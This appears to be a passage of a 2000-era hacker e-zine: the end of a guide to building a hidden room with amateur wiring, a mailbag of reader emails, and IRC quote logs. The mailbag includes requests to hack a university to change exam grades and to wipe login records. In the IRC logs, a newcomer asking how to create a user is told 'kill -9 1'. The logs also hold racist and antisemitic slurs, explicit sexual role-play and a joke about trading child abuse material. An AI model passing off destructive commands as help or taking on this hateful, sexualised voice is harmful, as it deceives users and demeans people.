the plywood, and a mid-4x4 has another end of the wood. On the loose end, pry some wood under it to hold it up, while you figure it out. What seems to work would be a long spike with a notch on the end to catch in the dirt, and the other end to screw into the wood. Ie: /|___________________________________/ / <-- catch in dirt [bend?] | ___________________________________/ <-- shove up into dirt |_|<-- part to screw to wood Shove that hoe up into the dirt, then screw into the wood. This provides you with a little security, but you need a bit more. Now do that to most of the end of the room, however many you need. On the border of the wood, where they touch when finished, you should nail/bolt/screw them together with another small piece of wood. Now you may have a bare spot in the center which is open, and hard to work, take the measurements, and cut the wood to size. Now you want to get Two 2x4's however long you think is enough, and cut them as so: The top part should be at a smooth angle, as to be not-so hard to |\ knock into the ceiling. | \ \ \ The bottom should be cut so when the woos is put into the ceiling at \ \ an angle, it \ \ will be plush with the ceiling. \_\ You want Two of these, and drive them in opposite directions into the empty space, like an X till they are all the way in. Now you will host the plywood up, while screwing it to these pieces of wood, then take the edges and fasten them to the other sheeps of plywood. Your ceiling is now finished, you may want to put a couple 2x4's stretched across the room from 4x4 to 4x4 to secure the plywood even more. Remember this isn�t all for fashion...yet, and who is going to be looking at your ceiling? Now if you want to use some spray paint or whatever on the walls, could even put up sheetrock[drywall] and paint it pro-like. You now have an '0d4y h4x0r p4d' Electrical: When installing the 4x8's on the walls of your hax0r pad, you may want to take into consideration...power...The average cord length is 6 feet, so its a rule that every outlet should be no more than 12 feet apart[6 in either direction] You beat that, you have 4x4 posts every 8 feet, which you should mount some electrical box's in. These box's are usually beige, or blue, and 3 inches tall, by a couple inches wide, and 2 deep. nail these things to the 4x4's open side where the plywood will go, sticking out about the thickness of the plywood. You will want to get some electrical wire, it is about 1/2-3/4 an inch wide, 1/4inch tall, and comes in rolls, it is white. There wires in it are separated by paper, and come with 3 wires, Ground, White, and Black, or Red. This wire is cheap, so I�m not going to go into detail on how to splice it, so you should run each one separately. Running each one to its own breaker is an advantage, cause it will be a bit more secure with the limitations of electricity on each line, especially if you are running many computers, and electrical shit. Your computers wont power off, but it will take more cable, and more breakers...they are cheap. Go to the hardware store, and buy some electrical outlets, connect the wires appropriately to the back of them, and screw them into the outlet box's on the 4x4's. Those wires from there should run back to your breaker box, where you will screw them into a breaker...this isn�t the most professional way, but its the safest way, going for easy. Take the end of the wire, and appropriately fastener it to the breaker, that is not yet in the box. Then power down the whole box, and install the breaker. Do this for each outlet, then turn on. You now have electricity. NOTE: Be sure to not leave wire exposed, and be as safe as you can. Also these methods are far from the BEST, but they do work. If you know of a better way, or of a qualified electrical, please have them help. Each circuit for every outlet isn�t too proficient, but it gets the job done, as long as you have a little bit of a cash flow...not even allot. EOF Decor: Now that you have allot of the necessities taken care of, its time for the ninja-part. You should paint the walls, and ceiling..Be sure to leave air flow for the fumes. Then move in any carpet you may want. After the carpet, move in any couches/desks/tv's/refrigerators/computers you need, and set them all up. Table lamps are a good idea, but if you wish to mount a light, it's the same principal as the outlets. Now is the time to fix up the door. To make this an uberhax0r pad, you need to hide the entrance. You should patch the outside, except for a small, yet reasonable doorway. In front of this doorway, you could put a bookshelf, couch, or anything to hide it. Be sure to put handles, or something to be able to close the entrance after you get in, and also make some sort of way to see out before you just open it up, and expose yourself to the whole world. These methods are by far not the best, and efficient ways of doing things, but they get the job done, and are fairly simple for the average man. Try other stuff, its a 'project'. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [20:. - [ mailbag ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ From: oeb@cotse.com To: Webmaster Subject: Form Results sent on 09/06/00 Date: 6. september 2000 18:52 The leet pinball easter egg in M$ \/\/0rd 97 ======================================== 1. Open j00r document 2. Type "Blue" (l3av3 0ut the " thingies) 3. Select it 4. set it t0 b0ld, and set the c0lour (yes i can spell it that way if i want) t0 blue 5. Put a space after the w0rd Blue 6. press help and then ab0ut 7. h0ld + and left-click the picture thingie 0n the left 0k y0u can n0w play a really SHIT game 0f pinball unTol you get b0red. the flippers are contr0lled by z and m. And the bit y0u will all want t0 hear, y0u can exit the thing (game) by pressing ---End of form data.--- > bob says: h0h0 0wn4g3! Thanks for providing yet another way to make it through the days at work. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: jef122@hotmail.com To: Webmaster Subject: Form Results sent on 09/12/00 Date: 12. september 2000 13:08 help me out have a bet running for lots of money that i can hack into the www.rug.ac.be central computer to change the points of some peoples exams highly illegal ???!! i promise 250 $ for the one that can help me out with their login procedure spread the word ! jef122 ---End of form data.--- > bob says: Finally, we are now up there with the likes of phrack and attrition, keep sending us lame mail! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: anthony.leung@virgin.net To: Webmaster Subject: Form Results sent on 10/28/00 Date: 28. oktober 2000 16:55 I have lots of questions: how do you get a http://randomcrap.com domain? How did you do it?! Does it involve paying lots of money? > bob says: um, yeah b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: Ryan Pagel To: pr3nc3@b0g.org Subject: Fwd: Hi! Date: 4. oktober 2000 02:59 -- --------- Forwarded Message --------- DATE: Sun, 01 Oct 2000 12:57:17 From: Maren Heite To: Ryan Pagel Hi Ryan! A year ago I have sent you an e-mail and you wrote me back. You remember?If not, it doesn4t matter!I found it very interesting to have an e-mail-friend who comes from another country AND from another continent. Please don4t look at my grammar and my english-writing: It4s very bad! I wish you would write me back now, because I think its nice to have a different speaking e-mail-friend!If you don4t remember who I am, you can also write back please. PLEASE WRITE BACK! CIAOI Maren > bob says: maren sounds like a hottie! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: Prae To: k-rad-bob@b0g.org Subject: h0h0h0h0 Date: 12. november 2000 11:15 h0h0, i found this in my sent mail thingy from ages++ ago :) put it in b0g :))))) the cgi is nearly done too :) ---------------------------------------------- Sent: Subject: Re: Hello there Date: Thu, 16 Mar 1996 16:18:47 -0800 To: Nathan Wressell Send me one more fucking E-mail and I'll break your fucking legs then rip your fucking head off and shit down your neck. Stop sending your shit to me, you idiot. You've been warned. Yours lovingly, Prae -------------------------------------------- > bob says: 0 to tha w to tha n to tha 4 to tha g to tha 3 b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: Mike Masters <_021@yahoo.com> To: b0g@b0g.org Subject: HACKERS!? Date: 10. oktober 2000 23:05 oppz hI iM A bIg FaN oF b0G bUt I WaS WoNdErInG wHy YoUr sO AgInSt JaY-pEE, CaUsE hE FouNdEd 2600 AnD AtTrItIoN AnD CyBeRaRmY, MaYbE YoUr JeAlOuS??? AnD wHy DoEs RlOxLeY ReMiNd Me oF JaY-pEE?? Is It CaUsE He AlSo HaS SkILLz? YoUr #1 FaN HaQQuR __________________________________________________ Do You Yahoo!? Get Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/ > bob says: We ArE JeAlOuS!@#! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: feedback To: k-rad-bob Subject: naked news Date: 22. september 2000 20:24 Greetings loyal viewer! Thankyou for your words of praise! We here at nakednews value your input, so keep on writing with thoughts and encouragement. We ARE the only network worth watching. Cheers. > >this is the best concep ever! >great idea >victoria is gorgeous! > bob says: www.nakednews.com dont miss it yall b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: vkjnkvn sdik dihon To: k-rad-bob@b0g.org Subject: Question Date: 2. september 2000 23:28 Hi there When i remove my entries from wtmp,utmp,lastlog, what command do i type to see if iam totaly gone from them.? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. > bob says: actually I don�t know, email jericho@attrition.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: vkjnkvn sdik dihon To: c0d3s@b0g.org Subject: question Date: 21. september 2000 00:12 Hi there What is the best way to cover my tracks before i go on to hack a system,i have heard of wingates,proxys,but must of them can log your ip,is there any other methods or techniques out there.? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. > bob says: HI AGAIN! actually I don�t know that either, email jericho@attrition.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: vkjnkvn sdik dihon To: twist@b0g.org Subject: question Date: 21. september 2000 00:11 Hi there What is the best way to cover my tracks before i go on to hack a system,i have heard of wingates,proxys,but must of them can log your ip,is there any other methods or techniques out there.? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. > bob says: HI AGAIN!!!!! Twist doesn�t know either, read above. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: vkjnkvn sdik dihon To: niemand1@b0g.org Subject: question Date: 21. september 2000 00:18 Hi There Can you answer this for me please. How do i deny connections to the x-window port. _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. > bob says: Does anyone else see a pattern to this? b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: John Conner To: various-gimps@b0g.org Subject: question's Date: 4. oktober 2000 00:36 Hi Could you answer these for me. How do i completely remove packages on a linux system.? What command can i type to see what directory utmp is in.? What is the best way to shutdown linux without having hard drive,or boot problems after.? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. > bob says: love is in the air b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: Bronc Buster To: k-rad-bob Subject: Re: b0g releases yet another issue! Date: 3. september 2000 07:48 Can you please take me off your list... > bob says: 0 to tha w to tha n to tha 4 to tha g to tha 3 b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: jamesl-s To: tronix@b0g.org Date: 6. oktober 2000 18:13 Subject: get a load of this!!!! Double click on the attached file ten send me your IP number!!! this is seriously cool!!! To get IP No. you goto Windows satrat menu, goto run then type winipcfg but make sure you are online!!! send it back asap and wait for weird things to happen!!!! > bob says: This guy is so leet he makes my boxers moist. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: jamesl-s To: tronix@b0g.org Subject: this is the file i meant to attach to the other e-mail!!! Date: 6. oktober 2000 18:17 follow the intructions on the previous e-mail and send that IPno.!!! > bob says: KeWl!!!!! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: gabe To: Sent: Monday, September 18, 2000 12:11 PM Subject: smoke that piece you wrote in the first issue of b0g, called "smoke" was prolly the best thing i've read in a very long time. you wrote it very beautifully, showing feelings in a subtle and indirect way; it was very good. have you written any other stuff like that? -gabe > bob says: This is actually the coolest email I have ever been sent. I'm just sharing this one with you because my ego told me to. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [21:. - [ IRC Quotes ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ camo, would you lick my nuts for $5? no way man I'll computer sex lick your nuts for a 50 dollar cdnow gift certificate though :) ok [21:28] <{cryptic}> tress is a british tosser....he likes any bird that has two legs and 3 holes [21:29] four holes duncha mean? [21:29] mouth [21:29] nose two. [21:29] pixie is into nasal sex [21:29] <{cryptic}> nose?! [21:29] shes probably from kenya or something [21:29] <{cryptic}> hahahaha [21:29] ... [21:29] ::dies:: shut up [21:29] :D [21:29] its still early [21:29] i'm like.. [21:29] nevermind!! [21:29] do you snort or blow? Oh my God! Are you attemping to DoS me? WTF are you talking about dumb ass I can't get into your MS-DOS nobody bullies me the jocks beat me up cause im diffrent except the nigger and mexican kids ever notice how the mini pizza pringles cans dont have a lot of pizza stuff on them but the normal sized ones do? to make an observation like that you must weigh at least 500lbs im doin' route now, heh wyze1 isn't it weird that "lusta" is an anagram for "aslut" can you hack?? yep, why? LeftAlone (~DomainWiz@gserver.gibca.co.ae) has joined #unix LeftAlone is now known as new2Unix hi what's the command to create a user? kill -9 1 <-- new2Unix has quit (Free NT/2000 AdminToolz: http://www.ascs.co.ae/admintoolz) hey bob wanna fuck? im not sure cure you might be *cough* male if its a female i call sloppy seconds im going to start talking about my penis and refering to him as an almighty god in real life if that doesnt get me chicks i dont know what the fuck will im not gay!@# oh I see :) i was "experimenting" Has anyone ever fired cum over there shoulder? hello everyone im looking for Eric Rutherford who's lives Houston, and he went to San Jac. South college, any body know him? <^40i3s> hack in the box is a program that takes servers and fits on to floppy Heather's not even worth those bum's that live behind grocery stores notice in pizza shops you don't notice any jews like owning one or operating one? I guess the ovens remind them of something im going on a computer nerd woman fucking spree at defcon if i go im going to be so fucked up at defcon you hear me? ill fuck goats FUCKING SPREE MICROSOFT BRAIN DRAIN CONTINUES. Fourteen-year vet. Paul Maritz resigns. how can he be an m$ veterna if he's only 14? then my mom will know i have sex with the coach i meant to say couch I have pics of leggless and armless people and other funny stuff but they're not developped yet or somebody stole my film haha, did you hear that a bunch of other 1337 ninjas threw tak in a pool at defcon because they thought he was a jew... at some hotel. rofl *** tak has joined #b0g IF YOUR A FAGIT AND YOU KNOW IT, CLAP YOUR HANDS *clap* *clap* were you breast fed as a baby, bob? ys did you enjoy sucking you rmommies boobies? yes it was my best childhood memory you remember?! YOU REMEMBER SUCKING THEM!? WH0RD ! nibbling her nipples with my toothless gums * Prae covers his erection with a cushion :))) THAT DUDE THAT LOOKS LIKE ZERO COOL IN MY SCHOOL ? whoops I YELLED ZERO COOL DURING LUNHC *** Rene14 has joined #b0g AND HE STOOD UP lol AND LOOKED AROUN I have braces that comes out my mouth and goes around my head and connects on my back to my spine *** Dawgyman has joined #b0g dawgyman likes to trade pokemon trader cards LOL tgpretend, have you ever tried wiping yoru ass with a 100 dollar bill before spending it? Bronc called me elite!@#$ uh no he didnt he called you a stupid sack of shit remember? oh yeah :( hello every one i am looking for a hacker that can hack a hotmail email will give 20$ for it.if you can msg me. lol xxxxxa we made a bot for this objective what do u mean with bot? just /msg bobskc login:hack password:your-mother suck my fathers cock! hmm raptures arrival is usually the cue to start being worried [11:13] (xxxxxa): yeah [11:13] (wh0rde): alright [11:13] (xxxxxa): am i talking to one? [11:13] (wh0rde): theres someone you can talk to, but she only talks to you if you trade kiddie porn with her [11:14] (wh0rde): ./msg b|ueberry I got some kiddie porn to trade for some hotmail hacking *** tress is now known as unixgrl lol hi boys @:!~ hi! asl heh use the infamous "i just broke a nail while coding a new bind exploit" line I love asl HAHHAHAHA that'll turn us on! thats sooo cute it reminds me of cyber days in teensex heh or teenchat LOL you perv! pervert1 pervert! i've been coding a new linux kernal and its make me so horny my pussy is wet * phyrewyre points at jess lol HAAHA * unixgrl takes off her knickers * k-rad-bob ejaculates fiercly, leaving fresh twads of juiy cum smeared all over his boxers at the mental image i need to restore my sexlife dammit ROFL * unixgrl stretches her long, silky legs AHHAHAHAHA hahaha dont we all * unixgrl rubs her throbbing clit with the mouse k-rad is a professional cyber guy hehe * unixgrl pushes a mouse in her cunt lol at ease soldier * unixgrl leaves the wire dangling out I should join teen sex hehe ROFL stuff the plug in your gaping rectum! * unixgrl swings it round and round AHHAAHAHAH * unixgrl ties up kidjess with it * unixgrl eat it out sugar what channel? #ukfags yes *** Now talking in #ukfags *** Joins: Sputn1k (penis@ haha! tricked you! *** Parts: Sputn1k (penis@ (�) Now talking in #lesbians hi everyone, im an 18/f/lesbo, anyone want sex? i do, send me your picture sexy honey ok (�) File old_naked_lady.jpg (58.3Kb) sucessfully sent to Jenny23 do you like it? ughhh yeah im masturbating to it now take it outside please fine then im gone (�) Parts: Prence (pr3nc3@max1-89.bscn.com) ************ 20 seconds later ************ Query with Jenny23 (hhh@modemcable003.140-202-24.nowhere.mc.videotron.ca) Common channels: none - waitttt yes? describe what ur doin right now im really excited after seeing ur pic ur breasts are so lickable :) im sticking the candle stick in my pussy mmmm go on and rubbing my nipples, the candle stick is so wet now oh yeah did i tell you it was light? it makes me hot mmmmmm ahhhhhh go onnnn are you masturbating? oh shit! the candle stick fell in, fuck fuck fuck, oh that lit candle inside my pussy is kind of hot yea i am mmmm ill get a candle myself im gettin jealous oh my, that candle burns, oh well, i got a free bikini wax :) go get a candle i just did hmm make sure its not the cheap kind cause they break and you will have a piece of wax in your pussy forever i got two :P hahaha ok are you shoving it in? im takin of my g-string is it making you wet? you were wearing a g-string? mmmmm sekzt sekzt sekzy oh yea damn i cant type when im masturbating yea i always do ;)) im wearing an f-string whats that? a different kind of g-string, when you walk the string rides up in your pussy and makes you want to orgasm in someones eye i gatta go im too wetttt bye babyyyy xoxox bye sekzy masturbataholic candle user ./me hack Tak, Exec[Open Cd-Rom] Prompt -Hacked- Except no Period what does it do Gets into there C Drive Try it in #hackphreak cool k * mikex hack Tak, Exec[Open Cd-rom] Prompt -Hacked- * mikex hack Insomina, Exec[Open Cd-rom] Prompt -Hacked- KNFAI*(#*&R LMFAO A(*&#R SMOKE open my CD-ROM k? * Smoke` mikex Exec(Open Cd-Rom) it didnt work why didnt it do anything It did it didnt open my cd drive Yes it did no it didnt it did it SO fast u couldnt tell what ever * Smoke` hack mikex Exec(Silent Delete C:\) h0h0 mikex Im hacking you! uhhh what wuz that its Deleting your hard drive mikex! QUICK MIKEX DO IT TURN OFF COMPUTER B4 IT RUINS YOUR SYSTEM MIKEX SERIOUSLY! Quits: mikex (mikex_15@1Cust30.tnt16.hou3.da.uu.net) (Read error to mikex[1Cust30.tnt16.hou3.da.uu.net]: Connection reset by peer) [14:45] help tefx! [14:45] i cant change it to hf anymore! [14:46] look i type: [14:46] ./nick hf [14:46] and it does this [14:46] *** poo is now known as hf [14:46] oh. [14:46] ok. prence: someone at school played a prank on a loser and they fed him like a whole bottle of viagra by putting it under the cheese of his pizza and then in the middle of class, his penis exploded and he had to go to the hospital I mean, I've got the vi pocket reference but im still confused Which ircop owned you? lol pokebonk cuz i "threthen" him *** cmJ\\ has quit IRC (G-lined ([2] Ban evasion)) who is runing RedHat with BSD kernel? er.... can anyone tell me what the telnet command is to edit an htm page? man i got maleria twice when i was there *** Hacker666 has joined #hacktech * Hacker666 {~._.~} * Hacker666 _( Y )_ * Hacker666 ()~*~() <------Here is a Teddy Hug for you *1 * Hacker666 (_)-(_) *** d0rn|x has left #hacktech uhm... * Hacker666 ----------- cuz your're so nice!--- * Hacker666 >---- {~._.~}- {~._.~}- {~._.~}- {~._.~}- * Hacker666 ----- ( � )--- ( � )--- ( � )--- ( � )- * Hacker666 ----> ()�H�()--()�U�()--()�G�()--()�S�()- * Hacker666 ----> (_)-(_)--(_)-(_)--(_)-(_)--(_)-(_)- * Hacker666 ----------- I love hugging Uneek [tak-] cause fat people make good hax0rs [twisty] like prae, only with skills I hate dogs they bite and shit. so does prae but we still love him prae has more skills then somalia has hunger [20:30] i just had a nap ;/ [20:30] i hate the way i feel when i wake up after a nap [20:30] i wish some child would walk in my door and ask me to buy some fucking cookies just so i could fling him out the nearest window do you think they will hire me? you guys wont get a job at home.com you're not stupid enough. AHHHHHHHHHHHHHHHHHHHHHHH!!!!!!!!! I JUST SET MY PUBES ON FIRE AND THEY DIDNT GO OUT I HAD TO THROW MILK ON THEM TO PUT THE FIRE OUT HOLY FUCK THAT WAS SCARY [note from ed, prae really did set his pubes on fire] au a bog is faeces assass|n is gagging for a shagging! lol really? yes *** arghhhh has quit IRC "im going to hang a bog " haha k-rad u offering? i think i am it would help if you were female but... soya oil and faith will do hahaha lol k-rad have u ever had a different nick? h0h0 808 k-rad-bob used to be known as Rloxley 21:38] <+Rane> Everyone turn to the discovery channel. [21:38] <+pinkboi> what about it? [21:38] <+LiL-A> hey bobberz [21:38] <+Rane> There's a special on masturbation. [21:38] <@k-rad-bob> hi lila :D [21:38] <@k-rad-bob> rane tape it [21:38] <+pinkboi> haha no way [21:38] <@k-rad-bob> please [21:38] <@k-rad-bob> and send it to me [21:38] <@k-rad-bob> i beg of you [21:38] <+optimum`> lol [21:38] <+Rane> k-rad-bob: Don't you get that channel? [21:38] <+optimum`> we need a transcript for b0g [21:39] <+CodeMason> hehe [21:39] <@k-rad-bob> no rane ;( [21:39] <@k-rad-bob> i dont have cable [21:39] <+pinkboi> woo terminator on sci-fi [21:39] <@k-rad-bob> i only have 4 channels [21:39] <+optimum`> lol [21:39] <+Rane> What good are you? [21:39] <+optimum`> poor bob [21:39] <+LiL-A> and all 4 of em are prolly porn [21:39] <+Rane> You poor piece of shit! [21:39] <+optimum`> wtf do you do all day? [21:39] <@k-rad-bob> sadly none of htem are pr0n ;( [21:39] <+optimum`> 4 channels of porn would be nice [21:39] * +Rane thinks maybe he masturbates [21:39] <+pinkboi> drink? [21:39] <+pinkboi> then drink more? [21:39] <+optimum`> mastrubation without porn? [21:39] <+Rane> then masturbate [21:39] <+optimum`> on tv [21:39] <+Rane> then drink more [21:39] <+pinkboi> hell i don't get one channel of porn [21:40] <+optimum`> i get 2 :) [21:40] <+pinkboi> *even [21:40] <+optimum`> one's all snowy and without sound but it's still porn [21:40] <+pinkboi> haha [21:40] <+Rane> Okay, now the hold lady is teaching masturbation [21:40] <+Rane> make it stop! [21:40] <@k-rad-bob> rane you besta tape it [21:41] <+pinkboi> dude...where are you seeing this? [21:41] <+Rane> Discovery Channel [21:41] <+pinkboi> i'm seeing a boat floating back and forth... [21:41] <+optimum`> lol [21:41] <+prieft> bah [21:41] <+prieft> discovery europe doesnt show it [21:41] <+prieft> :/ [21:41] <+Rane> Oh, mine is the canadian one [21:41] <+CodeMason> lol [21:41] <+pinkboi> discovery new york doesn't either =P [21:41] <+Rane> Now they are comparing filling a pita with vegetables to masturbation [21:42] <+CodeMason> is k-rad norwegian? [21:42] * +Rane shrugs [21:42] <+pinkboi> ahahah [21:42] * +CodeMason eyeballs the host [21:42] *** skint0r (skint@port53.msx16-osl.ppp.cybercity.no) Quit (http://solveggen.org /// h�h�) [21:42] <+pinkboi> ok who here is out of the U.S.? [21:42] <+optimum`> wtf does filling a peta have to do with jackin off? [21:42] <+Rane> omfg [21:42] <+pinkboi> lol [21:42] <+CodeMason> I'm from aussieland :o [21:42] <+Rane> The old lady masturbation teacher has blue hair and blue eyebrows and thick glasses [21:42] <+optimum`> lol [21:42] <+pinkboi> dude why can't we get that kind of quality programming [21:42] <+optimum`> she's old? [21:42] <+Rane> HAHAHA [21:43] <+Rane> OMG [21:43] <+Rane> LAWL [21:43] <+Rane> FOFLMAO [21:43] <+CodeMason> lololol [21:43] <+optimum`> fuck us programming [21:43] <+optimum`> i wanna see mastrubation tutorials [21:43] <+Rane> "My worst nightmare was at age 14 my mother sitting me down and trying to teach me to masturbate, ahahah" [21:43] <+Rane> BAAAAAHAHAHAHAH! [21:43] <+optimum`> LOL [21:43] <+pinkboi> *old lady voice* "Back in my day...I jacked off 10 men before i even went to bed every night.." [21:43] <+optimum`> they did not say that [21:43] <+pinkboi> AHHHHHH!!!! [21:43] <+CodeMason> ROFLMAO [21:43] <+pinkboi> THAT WAS SO FUCK ME UP!! [21:43] <+CodeMason> HAHAHAHAHAHA [21:43] <+optimum`> lol [21:43] *** thep0et (webgeek@06-081.008.popsite.net) Quit (Leaving) [21:43] <+Rane> That is FUNNY [21:44] <+pinkboi> "now hunny you stroke up and down like this...here i'll demonstrate on daddy" [21:44] <+optimum`> lol [21:44] <+Rane> She was like a mom too [21:44] <+optimum`> "you wanna take over sweetie?" [21:44] <+Rane> She looked about 40 ish [21:44] <+pinkboi> AHH! [21:44] <+Rane> "I ran out of the room screaming in embarassment" [21:44] <+optimum`> lol [21:44] <+pinkboi> ahahahahahah [21:44] <+optimum`> no shit [21:44] * +CodeMason shudders [21:44] * +CodeMason violently siezures [21:44] <+Rane> Oh, it's commercials :/ [21:45] <+Rane> Oh whee, it's back on! [21:45] <+pinkboi> lol [21:45] <+Rane> WTF [21:45] <+Rane> THEY ARE STROKING CARROTS [21:45] <+Rane> AND CUCUMBERS [21:45] <+pinkboi> woo here it comes [21:45] <+pinkboi> OMG! [21:45] <+optimum`> no fucking way [21:46] <+Rane> It's showing like, a family picnic [21:46] <@k-rad-bob> rane you besta be taping this! [21:46] * +prieft wonders if they have streaming video on the website [21:46] <+optimum`> lol [21:46] <+LiL-A> lmao [21:46] <+Rane> And dad is acting like the carrot is a dick [21:46] <+pinkboi> lol [21:46] <+optimum`> holy shit [21:46] <+optimum`> in front of the kids? [21:46] <+Rane> I didnt see kids [21:46] <+optimum`> canadians are fucked up [21:46] <+Rane> it was only for a second [21:46] <+optimum`> oh [21:46] <+CodeMason> man [21:46] <+pinkboi> hell yes they are [21:46] <+Rane> I hope there was no kids [21:46] <+optimum`> lol [21:47] <+prieft> how ghay [21:47] <+prieft> they dont :/ [21:47] <+CodeMason> canadian discovery is gradually turing into a hardcore porn channel by the day :o [21:47] *** Part1ti0n (~hem@adsl-141-151-136-220.bellatlantic.net) Quit (Read error to Part1ti0n[adsl-141-151-136-220.bellatlantic.net]: Connection reset by peer) [21:47] <+pinkboi> lol [21:47] <+optimum`> no more stroking cucumbers? [21:47] <+CodeMason> polaris sucks ass! optimum No such nick optimum End of /WHOIS list. - [21:47] <+Rane> No, they are saying how it used to be bad [21:48] *** optimum` is now known as optimum [21:48] <+Rane> AHHHHH! [21:48] <+optimum> lol now it's good? [21:48] <+Rane> IM SCARED FOR LIFE [21:48] <+optimum> what now? [21:48] <+CodeMason> man [21:48] <+Rane> SCARRED RATHER [21:48] <+CodeMason> somethingawful.com would LOVE this [21:48] <+Rane> Well... [21:48] <+pinkboi> ???? [21:48] <+Rane> There's this silhouette [21:48] <+Rane> and it turns [21:48] <+optimum> oh shit [21:48] <+Rane> and you see the hard-on [21:48] <+pinkboi> AHHHH! [21:48] <+Rane> and he starts stroking [21:48] <+optimum> LOL [21:48] <+Rane> AHHH! [21:48] <+pinkboi> ahahahah [21:48] <+CodeMason> OMFG!!!! [21:49] <+Rane> CLOSE UP OF MALE DICK [21:49] <+optimum> it's like boogie nights unedited on cable [21:49] <+optimum> lol [21:49] <+Rane> NO [21:49] <+Rane> GO AWAY [21:49] <+pinkboi> LOL [21:49] *** fro (fro@24-216-125-115.hsacorp.net) has joined #b0g [21:49] *** Beep sets mode: +v fro [21:49] * +CodeMason violently siezures [21:49] <+Rane> Oh, commercials. [21:49] <+optimum> i was canadian cable [21:49] <+optimum> want* [21:49] <+pinkboi> candadia rules =P [21:49] <+pinkboi> canadia even [21:49] <+Rane> Canada. [21:50] <+Rane> Right before it had that close up of the dick [21:50] <+Rane> there was these 2 chicks masturbating [21:50] <+pinkboi> woo hoo [21:50] <+Rane> then one went and helped the other [21:50] <+optimum> sweet [21:50] <+CodeMason> lol [21:50] <+CodeMason> LOL!! [21:50] <+pinkboi> american cable blows hard [21:50] <+CodeMason> LESBIAN PRON! [21:50] *** LiL-A (~sweetange@ Quit (what you can't have, you can't resist, in the game of seduction, there is only one rule, never fall in love...._) [21:51] <+pinkboi> *and the chorus swells* [21:51] <+CodeMason> what time is this on? [21:51] <+CodeMason> 4pm? [21:51] <+pinkboi> yea seriosly i wanna see this! [21:51] <+prieft> http://exn.ca/sexfiles/Home.cfm [21:51] <+Rane> It's the sex files [21:51] <+prieft> thats the site of that program liek [21:51] <+pinkboi> this is discovery?? [21:51] * +prieft just found it [21:51] <+prieft> :P [21:51] <+Rane> yah [21:52] <+CodeMason> lolol [21:52] 